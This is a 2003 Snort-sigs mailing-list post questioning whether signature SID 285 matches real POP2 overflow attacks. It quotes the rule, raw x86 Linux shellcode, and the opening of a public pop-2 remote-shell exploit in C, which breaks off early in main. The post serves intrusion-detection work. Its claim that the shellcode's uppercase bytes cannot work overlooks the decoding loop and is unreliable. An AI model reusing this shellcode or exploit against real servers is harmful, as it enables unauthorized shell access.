[Snort-sigs] Question on SID 285

Steven Alexander alexander.s at ...1565...
Tue Jun 10 12:00:03 EDT 2003


SID 285 is supposed to detect shellcode being sent to port 109 (Pop-2).
My question is on the origin of this rule.  The last bytes of this
shellcode (2f 4249 4e2f 5348) translate to the ascii characters
"/BIN/SH" .  Since Unixes are case sensitive this would not produce the
desired result for an attacker.  For a working exploit it should be "2f
6269 6e2f 7368" which corresponds to "/bin/sh".  Was this rule produced
from a dump of a successful attack?  Sometimes, exploits are modified in
order to disable their use by other hackers not in the know.  There may
be both working and non-working versions of this attack in existence and
it may be useful to detect each of them.  I was able to find a pop-2
exploit that uses the following shellcode:

  "\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01"
  "\x20\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89"
  "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0"
  "\xfe\xc0\xcd\x80\xe8\xcf\xff\xff\xff\x0f\x42\x49\x4e\x0f"
  "\x53\x48";

The last bytes of this shellcode correspond to the ascii ".BIN.SH" which
would also not work.  The first bytes "eb2c 5b89 d980 c106 39d9 7c07
8001" correspond to some of the executable code and would however be
detected by SID 284.

Should more rules be created or did I miss something?

-steven


Sid 285 is as follows:

alert tcp $EXTERNAL_NET any -> $HOME_NET 109 (msg:"POP2 x86 Linux
overflow"; flow:to_server,established; content:"|ffff ff2f 4249 4e2f
5348 00|"; classtype:attempted-admin; sid:285; rev:6;) 

The following is the pop-2 exploit that I was able to find:

/*
 * A pop-2 remote exploit that gives a nobody shell.
 * gcc pop.c -o pop -O3 -Wall 
 * Autodetects what version you're sploiting and adjusts ret position
and
 * offset accordingly.
 * Tested on redhat 5.2, 5.1, 5.0 and 4.2. Probably only really useful
 * using it on 5.2 tho, cos the rest will most likely have imap open
too.
 * NB: To exploit pop-2 you have to take into account the length of both

 * the hostname and username(unlike all the pop2 exploits out there).
 * - smiler
 */

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

unsigned char hellcode[]=
  "\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01"
  "\x20\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89"
  "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0"
  "\xfe\xc0\xcd\x80\xe8\xcf\xff\xff\xff\x0f\x42\x49\x4e\x0f"
  "\x53\x48";

struct type
  {
    char *text;
    int offset;
    int alignment;
  };

struct type types[]=
    {
      {"4.46",0,0
      },
      {"3.35",0,19},
      {"3.44",0,19},
      {"2.3(30)",0,19},
      {NULL,0,0}
    };

int pop2_type = 0;

#define RET 0xbffff5b1

void usage(char *prog);
int resolv(char *hname, struct in_addr *addr);
int send_oberflow(int fd, char *host, char *user, int offset);
void run_shell(int fd);
int set_pop_type(char *buf, int n);
int do_connect(struct sockaddr_in *serv);

char temp_pass[20], *password;

int main(int argc, char **argv)
{
  int fd,n;
  unsigned char buf[2048];
  struct sockaddr_in servaddr;

  if (argc < 5)
    usage(argv[0]);

  password = strdup(argv[3]);
  bzero(argv[3],strlen(argv[3]));

  /* Mask the password from the cmdline =) */
  bzero(&servaddr,sizeof(servaddr));
  servaddr.sin_family = AF_INET;
  servaddr.sin_port = htons(109);
  if (!resolv(argv[4],&servaddr.sin_addr))
    {
      herror("resolv");
      exit(-1);
    }




More information about the Snort-sigs mailing list